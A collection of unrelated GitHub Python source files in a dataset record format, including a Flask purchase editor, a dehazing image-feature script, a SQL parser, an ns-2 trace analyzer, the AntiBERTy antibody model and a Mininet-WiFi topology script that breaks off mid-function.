compra.merma_porcentaje / 100\n compra.cantidad_total = compra.cantidad - compra.merma_kg\n\n fecha = datetime.datetime.now()\n evento_user = session['usuario']\n operacion = 'Editar Compra'\n modulo = 'Compra'\n evento_desc += \";\" + str(compra)\n evento = Evento(usuario=evento_user, evento=operacion, modulo=modulo, fecha=fecha, descripcion=evento_desc)\n\n banco_id = Banco.query.filter_by(compra_id=compra_id).first().id\n transaccion = Banco.query.filter_by(id=banco_id).first()\n transaccion.monto = compra.monto\n\n db.session.add(evento)\n db.session.commit()\n flash('Se ha actualizado exitosamente.')\n return redirect(url_for('compras', cosecha_id=cosecha_id, tipo=\"compras\"))\n except:\n error = \"Hubo un error actualizando la cosecha.\"\n \n total_cantidad = sum(compra.cantidad_total for compra in compras)\n total_monto = sum(compra.monto for compra in compras)\n return render_template('compras.html', error=error, cosecha=cosecha, compras=compras, \n total_cantidad=total_cantidad, total_monto=total_monto)","repo_name":"fungikami/SAGC","sub_path":"src/compras.py","file_name":"compras.py","file_ext":"py","file_size_in_byte":12517,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6432634946","text":"# Python For Reference\n\n# Declaring Variables\nsome_list = [ \"fizzbuzz-js\", \"warehouse-js\", \"bowling-js\", \"lottery-js\", \"merge-js\", \"multiplication-js\", \"99bottles-js\", \"test-py\" ]\n\n\n# For Loop\nfor x in some_list:\n print(x + \"\\n\")\n\n# Sort List\nsorted_list = sorted( some_list, key=str.lower)\n","repo_name":"seattleskyline/CodingChallenges","sub_path":"references/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19331284641","text":"#1436번. 
영화감독 숌\n#666을 포함하는 숫자 중 몇 번째 숫자인지 출력\nn=int(input())\nmovie=666\ncount=0\n#movie를 1씩 더해감\nwhile(True):\n #666이 안에 있으면 count를 증가\n if \"666\" in str(movie):\n count+=1\n #count가 입력받은 값과 같다면 movie출력\n if count==n:\n print(movie) \n break\n movie+=1","repo_name":"Mercurius-0227/Baekjoon","sub_path":"movie_1436.py","file_name":"movie_1436.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11057188964","text":"import cv2\nimport numpy as np\n\n\n'''\ndef zmMinFilterGray(src, r=7):\n 最小值滤波,r是滤波器半径\n if r <= 0:\n return src\n #print(src.shape)\n #print(src.shape[:2])\n h, w = src.shape[:2]\n print(h,w);\n I = src\n print(list(range(1, h)) + [h - 1]);\n #print(np.array(I[[0] + list(range(h - 1)),:]).shape);\n res = np.minimum(I, I[[0] + list(range(h - 1)), :])\n #print(list(range(1, h)) + [h - 1]);\n res = np.minimum(res, I[list(range(1, h)) + [h - 1], :])\n I = res\n res = np.minimum(I, I[:, [0] + list(range(w - 1))])\n res = np.minimum(res, I[:, list(range(1, w)) + [w - 1]])\n return zmMinFilterGray(res, r - 1)\n'''\n#h,w为左上角像素的坐标,src\ndef minLvBoVec(src,rh,rw,h,w):\n #mat = src[h:h + 2 * r + 1, w:w + 2 * r + 1];\n mat=src[h:h + rh, w:w + rw];\n #print(mat*255)\n value = np.mat(mat).min();\n #new_mat = np.ones((2 * r + 1, 2 * r + 1))\n new_mat=np.ones((rh, rw))\n new_mat =new_mat*value;\n #f=open(\"doc.txt\",'w');\n #f.write(str(value)+'\\n');\n #print(value*255);\n return new_mat;\n\ndef zmMinFilterGray(src, r=7):\n\n #height,width=src.shape;\n\n #minVec=np.zeros(height,width);\n #最小滤波器做法1\n #minVec=src;\n # w=int(r/2);\n #1.中间进行最小值滤波\n '''\n for i in range(w,height-w):\n for j in range(w,width-w):\n mats=src[i-w:i+w+1,j-w:j+w+1];\n print(mats*255)\n value=np.mat(mats).min()\n minVec[i][j]=value;\n print(i,j,value*255);\n return minVec;\n '''\n '''\n height, width = src.shape;\n minVec = src;\n #非边缘位置\n hh,ww=int(height/r),int(width/r);\n for i in range(hh-1):\n for j in range(ww-1):\n h=i*r;w=j*r;\n mat=minLvBoVec(src,r,r,h,w);\n minVec[h:h + r, w:w + r] = mat;\n #minVec[h:h+2*r+1,w:w+2*r+1]=mat;\n\n #最下面的一行(不包含右下角)\n for j in range(ww-1):\n h=(hh-1)*r;w=j*r;\n new_r=(height-h);\n mat = minLvBoVec(src,new_r,r,h,w);\n minVec[h:height, w:w + r] = mat\n\n #最右边一列(不包含右下角)\n for i in range(hh-1):\n h=i*r;w=(ww-1)*r;\n new_r=width-w;\n mat = minLvBoVec(src,r,new_r, h, w);\n minVec[h:h + r,w:width] = mat;\n\n #最右下角 h=height-(hh-1)*r;w=width-ww-1)*r;\n h=(hh-1)*r;w=(ww-1)*r;\n rh=height-h;rd=width-w;\n mat=minLvBoVec(src,rh,rd,h,w);\n minVec[h:height,w:width]=mat;\n return minVec;\n '''\n return cv2.erode(src, np.ones((r, r)))\n\n#窗口半径,p为误差校验值\ndef guidedfilter(I, p, r, eps):\n '''''引导滤波,直接参考网上的matlab代码'''\n height, width = I.shape\n m_I = cv2.boxFilter(I, -1, (r, r))\n m_p = cv2.boxFilter(p, -1, (r, r))\n m_Ip = cv2.boxFilter(I * p, -1, (r, r))\n cov_Ip = m_Ip - m_I * m_p\n\n m_II = cv2.boxFilter(I * I, -1, (r, r))\n var_I = m_II - m_I * m_I\n\n a = cov_Ip / (var_I + eps)\n b = m_p - a * m_I #\n\n m_a = cv2.boxFilter(a, -1, (r, r))\n m_b = cv2.boxFilter(b, -1, (r, r))\n #print(m_a)\n return m_a * I + m_b\n\ndef getV1(m, r, eps,w, maxV1): # 输入rgb图像,值范围[0,1]\n '''计算大气遮罩图像V1和光照值A, V1 = 1-t/A'''\n Vc = np.min(m, 2) # 得到暗通道图像\n #cv2.imwrite(\"E:\\\\testIMG\\\\testPython\\\\gray_img.jpg\", Vc*255)\n\n Vc_min=zmMinFilterGray(Vc, 5) #最小值滤波后\n #cv2.imwrite(\"E:\\\\testIMG\\\\testPython\\\\min_img.jpg\", Vc_min * 255)\n V1 = guidedfilter(Vc, Vc_min, r, eps) # 使用引导滤波优化\n 
#cv2.imwrite(\"E:\\\\testIMG\\\\testPython\\\\guide_img.jpg\", V1 * 255)\n\n V1=np.clip(V1,0.0,1.0);\n\n bins = 2000; #原来为2000份\n ht = np.histogram(Vc, bins) # 计算大气光照A 统计函数,分成1000份进行统计\n d = np.cumsum(ht[0]) / float(V1.size) #d中d[i]为ht[0]前i项之和\n #从后往前进行统计\n for lmax in range(bins - 1, 0, -1):\n if d[lmax] <= 0.999:\n break\n try:\n #print( np.mean(m, 2)[V1 >= ht[1][lmax]])\n A = np.mean(m, 2)[V1 >= ht[1][lmax]].max() #大于前0.1%中取最大值\n except:\n A=0.95;\n return V1, A\n\ndef deHaze(m, r=100, eps=0.05, w=0.90, maxV1=0.80, bGamma=False):\n Vc = np.min(m, 2) # 得到暗通道图像\n Vv=Vc*255;\n Y = np.zeros(m.shape)\n Yc=np.zeros(m.shape)\n V1, A = getV1(m, r, eps,w, maxV1) # 得到暗通道图像和大气光照\n\n tx=1-w*(V1/A);\n #print(tx.shape)\n #tx=guidedfilter(Vc,tx,r,eps);\n #tx1=1-w*(Vc/A);\n #cv2.imwrite(\"E:\\\\testIMG\\\\testPython\\\\transmissiontx.jpg\",tx*255);\n #cv2.imwrite(\"E:\\\\testIMG\\\\testPython\\\\transmissiontx1.jpg\", tx1 * 255);\n\n t0=np.ones(tx.shape);\n t0=t0*0.1;\n tx = np.maximum(tx, t0);\n\n\n '''\n for k in range(3):\n #Yc[:, :, k] = (m[:, :, k] - V1) / (1 - Vc / A) # 颜色校正\n Y[:,:,k]=(m[:,:,k]-A)/np.maximum(tx,t0)+A; #恢复公式\n Yc[:, :, k] = (m[:, :, k] - A) / np.maximum(tx1, t0) + A; # 恢复公式\n\n Y = np.clip(Y, 0.0, 1.0) #将Y的元素的值限制在0,1\n Yc=np.clip(Yc,0.0,1.0);\n if bGamma:\n Y = Y ** (np.log(0.5) / np.log(Y.mean())) # gamma校正,默认不进行该操作\n '''\n\n #print(tx.flatten());\n\n return tx.flatten();\n\n#基于cv实现图像缩放\ndef ResizeImage(OringinImage):\n\n try:\n newSize=(20,20); #图像缩放后同一为300*300\n #h,w=OringinImage.shape;\n newImage=cv2.resize(OringinImage,newSize,cv2.INTER_LINEAR);\n return newImage;\n except cv2.error as e:\n raise RuntimeError(\"OriginImage None\");\n\ndef TrainData(List):\n TrainSet=[];#newSize=(300,300);\n for item in List:\n #提取图片,并将图像缩放到统一的像素\n init_image=cv2.imread(\"image/\"+item);\n newImage = ResizeImage(init_image);\n tx=deHaze(newImage/255.0);\n TrainSet.append(tx);\n\n return TrainSet;\n\ndef getTx(Image):\n #mat=cv2.imread(\"Data1/image0/(1).jpg\");\n #print(mat);\n #try:\n tx=deHaze(ResizeImage(cv2.imread(\"Data1/\"+Image))/255.0);\n tx=tx.flatten();\n #tx=np.sort(tx)[:300];\n #print(Image,tx);\n #tx=tx*255;\n #image=ResizeImage(cv2.imread(\"Data1/\"+Image));\n #tx=np.min(image,2);\n return tx;\n #return tx.flatten();\n # except:\n # raise \"Error\";\n#为测试集创建的tx,直接读取文件路径\ndef getTx_test(image):\n tx=deHaze(ResizeImage(cv2.imread(image))/255.0);\n tx=tx.flatten();\n return tx;\n\ndef TestSet():\n List=[1,1,3,5]\n return List;\ndef getSize():\n return 300*300;\nif __name__ == '__main__':\n List=[\"30.jpg\",\"52.5.jpg\",\"54.jpg\",\"54.5.jpg\",\"56.jpg\",\"56.5.jpg\",\"98.5.jpg\",\"164.5.jpg\",\"256.5.jpg\"];\n trainSet=TrainData(List);\n print(len(trainSet));\n mat=cv2.imread('image/54.5.jpg');\n cv2.COLOR_RGB2GRAY\n #mat=cv2.imread('image/54.5.jpg');\n #array=np.array(mat);\n #cv2.imwrite(\"E:\\\\testIMG\\\\testPython\\\\img.jpg\",mat)\n\n #V1,Vc = deHaze(cv2.imread('image/54.5.jpg') / 255.0);\n #cv2.imwrite(\"E:\\\\testIMG\\\\testPython\\\\img_result_guider.jpg\", V1*255)\n #cv2.imwrite(\"E:\\\\testIMG\\\\testPython\\\\img_result.jpg\", Vc*255)\n","repo_name":"coldwater007/pm2.5_img_analysic","sub_path":"source/特征提取/PM25Test.py","file_name":"PM25Test.py","file_ext":"py","file_size_in_byte":7158,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"16090808250","text":"import regex as re\nimport pandas as pd\nfrom collections import defaultdict\n\ndef tables_in_query(sql_str):\n\n # remove the /* */ comments\n q = 
re.sub(r\"/\\*[^*]*\\*+(?:[^*/][^*]*\\*+)*/\", \"\", sql_str)\n\n # remove whole line -- and # comments\n lines = [line for line in q.splitlines() if not re.match(\"^\\s*(--|#)\", line)]\n\n # remove trailing -- and # comments\n q = \" \".join([re.split(\"--|#\", line)[0] for line in lines])\n\n # split on blanks, parens, semicolons, and commas\n tokens = re.split(r\"[\\s)(;,]+\", q)\n\n # scan the tokens. if we see a FROM or JOIN, we set the get_next\n # flag, and grab the next one (unless it's SELECT).\n\n result = set()\n get_next = False\n for tok in tokens:\n if get_next:\n if tok.lower() not in [\"\", \"select\"]:\n result.add(tok)\n get_next = False\n get_next = tok.lower() in [\"from\", \"join\"]\n\n return result\n\nsample_query = \"\"\"SELECT\n c.calendar_date,\n c.calendar_year,\n c.calendar_month,\n c.calendar_dayname,\n COUNT(DISTINCT co.order_id) AS num_orders,\n COUNT(ol.book_id) AS num_books,\n SUM(ol.price) AS total_price,\n SUM(COUNT(ol.book_id)) OVER (\n PARTITION BY c.calendar_year, c.calendar_month\n ORDER BY c.calendar_date\n ) AS running_total_num_books,\n LAG(COUNT(ol.book_id), 7) OVER (ORDER BY c.calendar_date) AS prev_books\n FROM calendar_days c\n LEFT JOIN cust_order co ON c.calendar_date = DATE(co.order_date)\n LEFT JOIN order_line ol ON co.order_id = ol.order_id\n GROUP BY c.calendar_date, c.calendar_year, c.calendar_month, c.calendar_dayname\n ORDER BY c.calendar_date ASC;\"\"\"\n\ntable_names = tables_in_query(sample_query)\n\ndef GetAliases(sample_query):\n q = re.sub(r\"/\\*[^*]*\\*+(?:[^*/][^*]*\\*+)*/\", \"\", sample_query)\n\n # remove whole line -- and # comments\n lines = [line for line in q.splitlines() if not re.match(\"^\\s*(--|#)\", line)]\n\n # remove trailing -- and # comments\n q = \" \".join([re.split(\"--|#\", line)[0] for line in lines])\n\n # split on blanks, parens, semicolons, and commas\n tokens = re.split(r\"[\\s)(;,]+\", q)\n\n it = iter(tokens)\n tokens[:] = [f\"{i}:{next(it)}\" if i in table_names else i for i in it]\n\n aliases = []\n temp = r'(%s.*)' % ':.*|'.join(table_names)\n for i in tokens:\n match = re.findall(temp,i)\n if len(match) >0 :\n aliases.append(re.sub(r\"[\\['\\]]\", \"\", f'{match}'))\n aliases\n\n aliases_dict = {}\n for aliase in aliases:\n aliases_dict[aliase.split(\":\")[0]] = aliase.split(\":\")[1]\n \n return aliases_dict\n\ndef GetQueryColumns(tables):\n aliases_dict = GetAliases(sample_query)\n columns = []\n column_string = r'(^%s\\W\\w*)' % '\\W\\w*|^'.join(aliases_dict.values())\n for i in tokens:\n match = re.findall(column_string,i)\n if len(match) > 0 :\n columns.append(re.sub(r\"[\\['\\]]\", \"\", f\"{match}\"))\n column_names = set(columns)\n\n aliases = []\n columns = []\n for x in column_names:\n aliases.append(x.split('.')[0])\n columns.append(x.split('.')[1])\n\n combined_dict = defaultdict(list)\n for k, v in zip(aliases,columns):\n combined_dict[k].append(v)\n \n return combined_dict\n\nquery2 = \"\"\"\n SELECT ProductID, Name, SellStartDate FROM SalesLT.Product \n WHERE year(SellStartDate)='2005';\n \"\"\"\n\ndef GetFilters(sql_string):\n # remove the /* */ comments\n q = re.sub(r\"/\\*[^*]*\\*+(?:[^*/][^*]*\\*+)*/\", \"\", sql_string)\n\n # remove whole line -- and # comments\n lines = [line for line in q.splitlines() if not re.match(\"^\\s*(--|#)\", line)]\n\n # remove trailing -- and # comments\n q = \" \".join([re.split(\"--|#\", line)[0] for line in lines])\n\n # split on blanks, parens, semicolons, and commas\n tokens = re.split(r\"[\\s)(;,]+\", q)\n \n # scan the tokens. 
if we see a FROM or JOIN, we set the get_next\n # flag, and grab the next one (unless it's SELECT).\n filters = re.findall(r'WHERE(.*);', sql_string)\n\n return filters","repo_name":"carolashb/work-stuff","sub_path":".ipynb_checkpoints/SQLParse-checkpoint.py","file_name":"SQLParse-checkpoint.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10236991647","text":"\"\"\"convert iscouttask\"\"\"\n\n# -*- coding:utf-8 -*-\n\nimport traceback\n\nfrom datacontract import DataSeg, InputData, IscoutTask\nfrom dataparser import DataParser\n\nfrom .converterstandard import ConverterStandard\n\n\nclass ConverterIScoutTask(ConverterStandard):\n \"\"\"\n fields: 当前转换器需要验证的字段集合,> <字段名,<是否必要,是否区分大小写>>\n \"\"\"\n\n def __init__(self, uniquename, fields: dict, extendfields: dict,\n extensions: list):\n\n if not isinstance(extensions, list) or len(extensions) < 1:\n raise Exception(\n \"Specified ConverterIScoutTask extension is invalid\")\n\n ConverterStandard.__init__(self, uniquename, fields, extensions,\n extendfields)\n\n def _convert(self, data: InputData) -> iter:\n \"\"\"将中心下发的任务转换为自有的通用任务结构Task体枚举(一个文件可能有多个任务段)\"\"\"\n try:\n if data.stream is None or not data.stream.readable():\n self._logger.error(\n \"Data stream is None when trying to convert to standard Task: %s\"\n % data._source)\n return\n\n for dicseg in self._get_segments(data):\n if dicseg is None or len(dicseg._fields) < 1:\n continue\n try:\n # 创建任务对象\n\n task: IscoutTask = IscoutTask.create_from_dict(\n dicseg._fields, data._platform)\n\n task.segindex = dicseg.segindex\n task.segline = dicseg.segline\n\n if task is None or not isinstance(task, IscoutTask):\n self._logger.error(\"Parse IscoutTask failed.\")\n continue\n\n yield task\n\n except Exception:\n self._logger.error(\n \"Generate IscoutTask from dic fields error:\\ndata:%s\\nex:%s\"\n % (data._source, traceback.format_exc()))\n if not data is None:\n data.on_complete(False)\n\n except Exception:\n self._logger.error(\n \"Convert data to IscoutTask error:\\ndata:%s\\nex:%s\" %\n (data._source, traceback.format_exc()))\n if not data is None:\n data.on_complete(False)\n","repo_name":"Octoberr/sspywork","sub_path":"savecode/threeyears/idownserver/stdconvertmanagement/converteriscouttask.py","file_name":"converteriscouttask.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"70739258925","text":"\n#!/usr/bin/python\n# -*- Coding: utf-8 -*-\n\nfrom models2 import Queue, Node\n\ndef enqueue(queue):\n\tif log[5] != '40':\n\t\tqueue.enqueue_tcp()\n\telif log[4] == 'ack':\n\t\tqueue.enqueue_ack()\n\telif log[4] == 'tcp':\n\t\tqueue.enqueue_tcp40()\n\ndef dequeue(queue):\n\tif log[5] != '40':\n\t\tqueue.dequeue_tcp()\n\telif log[4] == 'ack':\n\t\tqueue.dequeue_ack()\n\telif log[4] == 'tcp':\n\t\tqueue.dequeue_tcp40()\n\ndef receive(node):\n\tif log[5] != '40':\n\t\tnode.receive_tcp(int(log[5]))\n\telif log[4] == 'ack':\n\t\tnode.receive_ack()\n\telif log[4] == 'tcp':\n\t\tnode.receive_tcp40()\n\ndef drop(node):\n\tif log[5] != '40':\n\t\tnode.drop_tcp(int(log[5]))\n\telif log[4] == 'ack':\n\t\tnode.drop_ack()\n\telif log[4] == 'tcp':\n\t\tnode.drop_tcp40()\n\nif __name__=='__main__':\n\tlink_a = Queue('link_a')\n\tlink_b = Queue('link_b')\n\tlink_c = Queue('link_c')\n\tnode0 = Node('node0')\n\tnode1 = Node('node1')\n\tnode2 = Node('node2')\n\tnode3 = Node('node3')\n\tstart_time = 
0\n\tend_time = 0\n\n\tline = raw_input()\n\tstart_time = line.split()[1]\n\twhile line:\n\t\tlog = line.split()\n\t\tend_time = log[1]\n\t\tif log[0] == '+':\n\t\t\tif int(log[2]) + int(log[3]) == 1:\n\t\t\t\tenqueue(link_a)\n\t\t\telif int(log[2]) + int(log[3]) == 3:\n\t\t\t\tenqueue(link_b)\n\t\t\telif int(log[2]) + int(log[3]) == 5:\n\t\t\t\tenqueue(link_c)\n\n\t\tif log[0] == '-':\n\t\t\tif int(log[2]) + int(log[3]) == 1:\n\t\t\t\tdequeue(link_a)\n\t\t\telif int(log[2]) + int(log[3]) == 3:\n\t\t\t\tdequeue(link_b)\n\t\t\telif int(log[2]) + int(log[3]) == 5:\n\t\t\t\tdequeue(link_c)\n\n\t\tif log[0] == 'r':\n\t\t\tif log[3] == '0':\n\t\t\t\treceive(node0)\n\t\t\telif log[3] == '1':\n\t\t\t\treceive(node1)\n\t\t\telif log[3] == '2':\n\t\t\t\treceive(node2)\n\t\t\telif log[3] == '3':\n\t\t\t\treceive(node3)\n\n\t\tif log[0] == 'd':\n\t\t\tif log[2] == '0':\n\t\t\t\tdrop(node0)\n\t\t\telif log[2] == '1':\n\t\t\t\tdrop(node1)\n\t\t\telif log[2] == '2':\n\t\t\t\tdrop(node2)\n\t\t\telif log[2] == '3':\n\t\t\t\tdrop(node3)\n\t\ttry:\n\t\t\tline = raw_input()\n\t\texcept EOFError:\n\t\t\tbreak\n\n\tthrough_put = node3.get_packet() * 8 / (float(end_time) - float(start_time))\n\tprint(' - - - - - - - - - - - - - - - - - ')\n\tprint('start_time = ' + start_time)\n\tprint('end_time = ' + end_time)\n\tprint('time = ' + str(float(end_time) - float(start_time)))\n\tprint(' - - - - - - - - - - - - - - - - - ')\n\tnode0.print_result()\n\tprint(' - - - - - - - - - - - - - - - - - ')\n\tlink_a.print_result()\n\tprint(' - - - - - - - - - - - - - - - - - ')\n\tnode1.print_result()\n\tprint(' - - - - - - - - - - - - - - - - - ')\n\tlink_b.print_result()\n\tprint(' - - - - - - - - - - - - - - - - - ')\n\tnode2.print_result()\n\tprint(' - - - - - - - - - - - - - - - - - ')\n\tlink_c.print_result()\n\tprint(' - - - - - - - - - - - - - - - - - ')\n\tnode3.print_result()\n\tprint(' - - - - - - - - - - - - - - - - - ')\n\tprint(node3.name + '.get_packet(bit) = ' + str(node3.get_packet() * 8))\n\tprint('through put = '+ str(through_put))\n\tprint(' - - - - - - - - - - - - - - - - - ')\n","repo_name":"yuucu/ad-network","sub_path":"kadai2/main_kadai2.py","file_name":"main_kadai2.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70783391404","text":"from dataclasses import dataclass\nfrom typing import Optional, Tuple\nimport torch\nfrom torch import nn\nfrom transformers.models.bert.modeling_bert import BertPreTrainedModel, BertModel, BertLMPredictionHead, ModelOutput\n\nfrom antiberty.utils.general import exists\n\n\nclass AntiBERTyHeads(nn.Module):\n \"\"\"\n Classification heads for AntiBERTy model.\n \"\"\"\n def __init__(self, config):\n super().__init__()\n self.predictions = BertLMPredictionHead(config)\n self.species = nn.Linear(config.hidden_size, 6)\n self.chain = nn.Linear(config.hidden_size, 2)\n self.graft = nn.Linear(config.hidden_size, 2)\n\n def forward(self, sequence_output, pooled_output):\n prediction_scores = self.predictions(sequence_output)\n species_score = self.species(pooled_output)\n chain_score = self.chain(pooled_output)\n graft_score = self.graft(pooled_output)\n return prediction_scores, species_score, chain_score, graft_score\n\n\n@dataclass\nclass AntiBERTyOutput(ModelOutput):\n \"\"\"\n Output type of for AntiBERTy model.\n \"\"\"\n\n loss: Optional[torch.FloatTensor] = None\n prediction_logits: torch.FloatTensor = None\n species_logits: torch.FloatTensor = None\n chain_logits: 
torch.FloatTensor = None\n    graft_logits: torch.FloatTensor = None\n    hidden_states: Optional[Tuple[torch.FloatTensor]] = None\n    attentions: Optional[Tuple[torch.FloatTensor]] = None\n\n\nclass AntiBERTy(BertPreTrainedModel):\n    \"\"\"\n    BERT model for antibody sequences, with classification heads\n    for species, chain type, and presence of grafting\n    \"\"\"\n    def __init__(self, config):\n        super().__init__(config)\n\n        self.bert = BertModel(config)\n        self.cls = AntiBERTyHeads(config)\n\n        self.init_weights()\n\n        self.num_species = 6\n        self.num_chains = 2\n        self.num_grafts = 2\n\n    def get_output_embeddings(self):\n        return self.cls.predictions.decoder\n\n    def set_output_embeddings(self, new_embeddings):\n        self.cls.predictions.decoder = new_embeddings\n\n    def forward(\n        self,\n        input_ids,\n        attention_mask=None,\n        token_type_ids=None,\n        position_ids=None,\n        head_mask=None,\n        inputs_embeds=None,\n        labels=None,\n        species_label=None,\n        chain_label=None,\n        graft_label=None,\n        output_attentions=None,\n        output_hidden_states=None,\n        return_dict=None,\n    ):\n        return_dict = return_dict if exists(\n            return_dict) else self.config.use_return_dict\n\n        outputs = self.bert(\n            input_ids,\n            attention_mask=attention_mask,\n            token_type_ids=token_type_ids,\n            position_ids=position_ids,\n            head_mask=head_mask,\n            inputs_embeds=inputs_embeds,\n            output_attentions=output_attentions,\n            output_hidden_states=output_hidden_states,\n            return_dict=return_dict,\n        )\n\n        sequence_output, pooled_output = outputs[:2]\n        prediction_scores, species_score, chain_score, graft_score = self.cls(\n            sequence_output, pooled_output)\n\n        b = input_ids.shape[0]\n\n        total_loss, masked_lm_loss, species_loss, chain_loss, graft_loss = None, None, None, None, None\n        if exists(labels):\n            mlm_loss_fct = nn.CrossEntropyLoss()\n            masked_lm_loss = mlm_loss_fct(\n                prediction_scores.view(-1, self.config.vocab_size),\n                labels.view(-1))\n\n        if exists(species_label):\n            species_freqs = torch.bincount(species_label,\n                                           minlength=self.num_species)\n            species_weights = b / (species_freqs * self.num_species)\n            species_loss_fct = nn.CrossEntropyLoss(weight=species_weights)\n            species_loss = species_loss_fct(\n                species_score.view(-1, self.num_species),\n                species_label.view(-1))\n\n        if exists(chain_label):\n            chain_freqs = torch.bincount(chain_label,\n                                         minlength=self.num_chains)\n            chain_weights = b / (chain_freqs * self.num_chains)\n            chain_loss_fct = nn.CrossEntropyLoss(weight=chain_weights)\n            chain_loss = chain_loss_fct(chain_score.view(-1, 2),\n                                        chain_label.view(-1))\n\n        if exists(graft_label):\n            graft_freqs = torch.bincount(graft_label,\n                                         minlength=self.num_grafts)\n            graft_weights = b / (graft_freqs * self.num_grafts)\n            graft_loss_fct = nn.CrossEntropyLoss(weight=graft_weights)\n            graft_loss = graft_loss_fct(graft_score.view(-1, 2),\n                                        graft_label.view(-1))\n\n        losses = [l for l in (masked_lm_loss, species_loss, chain_loss,\n                              graft_loss) if exists(l)]\n        total_loss = sum(losses) if losses else None\n\n        if not return_dict:\n            output = (prediction_scores, species_score, chain_score,\n                      graft_score) + outputs[2:]\n            return ((total_loss, ) + output) if exists(total_loss) else output\n\n        return AntiBERTyOutput(\n            loss=total_loss,\n            prediction_logits=prediction_scores,\n            species_logits=species_score,\n            chain_logits=chain_score,\n            graft_logits=graft_score,\n            hidden_states=outputs.hidden_states,\n            attentions=outputs.attentions,\n        
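# hidden_states and attentions are forwarded unchanged from the\n        # underlying BertModel call above\n        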
)\n","repo_name":"jeffreyruffolo/AntiBERTy","sub_path":"antiberty/model/AntiBERTy.py","file_name":"AntiBERTy.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"40021817667","text":"#!/usr/bin/python\n\n'This example creates a simple network topology with 1 AP and 2 stations'\n\nimport sys\n\nfrom functools import partial\n\nfrom mininet.log import setLogLevel, info, debug\nfrom mininet.node import RemoteController\nfrom mn_wifi.node import Station\nfrom mn_wifi.cli import CLI\nfrom mn_wifi.net import Mininet_wifi\nimport configparser\n\nclass Link(object):\n\n def __init__(self, strNode1, strNode2, **kwargs):\n self.strNode1 = strNode1\n self.strNode2 = strNode2\n self.kwargs = kwargs\n\n def toString(self):\n strReturn = ' %s <-> %s : %s' % (self.strNode1, self.strNode2, ['%s: %s' % (str(x), str(y)) for x, y in self.kwargs.items()])\n return strReturn\n\nclass Node(object):\n\n def __init__(self, strName, **kwargs):\n self.strName = strName\n self.kwargs = kwargs\n\n def toString(self):\n strReturn = ' %s : %s' % (self.strName, ['%s: %s' % (str(x), str(y)) for x, y in self.kwargs.items()])\n return strReturn\n\nclass MyTopology(object):\n\n def __init__(self):\n self.lstStations = []\n self.lstAccessPoints = []\n self.lstLinks = []\n\n def addStation(self, strName, **kwargs):\n self.lstStations.append(Node(strName, **kwargs))\n\n def addAccessPoint(self, strName, **kwargs):\n self.lstAccessPoints.append(Node(strName, **kwargs))\n\n def addLink(self, strNode1, strNode2, **kwargs):\n self.lstLinks.append(Link(strNode1, strNode2, **kwargs))\n\n def toString(self):\n info('Stations (%d) ----------------\\n' % len(self.lstStations))\n for pStation in self.lstStations:\n info(pStation.toString() + '\\n')\n\n info('AccessPoints (%d) ----------------\\n' % len(self.lstAccessPoints))\n for pAp in self.lstAccessPoints:\n info(pAp.toString() + '\\n')\n \n info('Links (%d) ----------------\\n' % len(self.lstLinks))\n for pLink in self.lstLinks:\n info(pLink.toString() + '\\n')\n\ndef topology():\n\n privateDirs = [ ( '/var/log', '/tmp/%(name)s/var/log' ),\n ( '/var/run', '/tmp/%(name)s/var/run' ),\n ( '/run', '/tmp/%(name)s/run' ),\n '/var/mn' ]\n station = partial( Station,\n privateDirs=privateDirs )\n \"Create a network.\"\n net = Mininet_wifi(station=station)\n \n topo = processTopo(topoFile='/home/vagrant/icnsimulations/topologies/wifi-topo12-noloop.conf')\n topo.toString()\n\n # Add access points\n for topoAp in topo.lstAccessPoints:\n topoAp.kwargs['client_isolation'] = True\n net.addAccessPoint(topoAp.strName, protocols='OpenFlow13', ssid=\"simpletopo\" + str(topoAp.strName), mode=\"g\", channel=\"5\", **topoAp.kwargs)\n \n # Add stations\n for topoStation in topo.lstStations:\n net.addStation(topoStation.strName, **topoStation.kwargs)\n\n # Add controller\n c0 = net.addController('c0', controller=RemoteController, ip='127.0.0.1', port=6653)\n\n info(\"*** Configuring wifi nodes\\n\")\n net.configureWifiNodes()\n\n info(\"*** Associating Stations\\n\")\n for topoLink in topo.lstLinks:\n pNode1 = findNodeByName(topoLink.strNode1, net.aps + net.stations)\n pNode2 = findNodeByName(topoLink.strNode2, net.aps + net.stations)\n if (pNode1 is None) or (pNode2 is None):\n raise Exception('Could not find name in node list name1=%s name2=%s' % (topoLink.strNode1, topoLink.strNode2))\n else:\n net.addLink(pNode1, pNode2, **topoLink.kwargs)\n\n info(\"*** Starting network\\n\")\n net.build()\n 
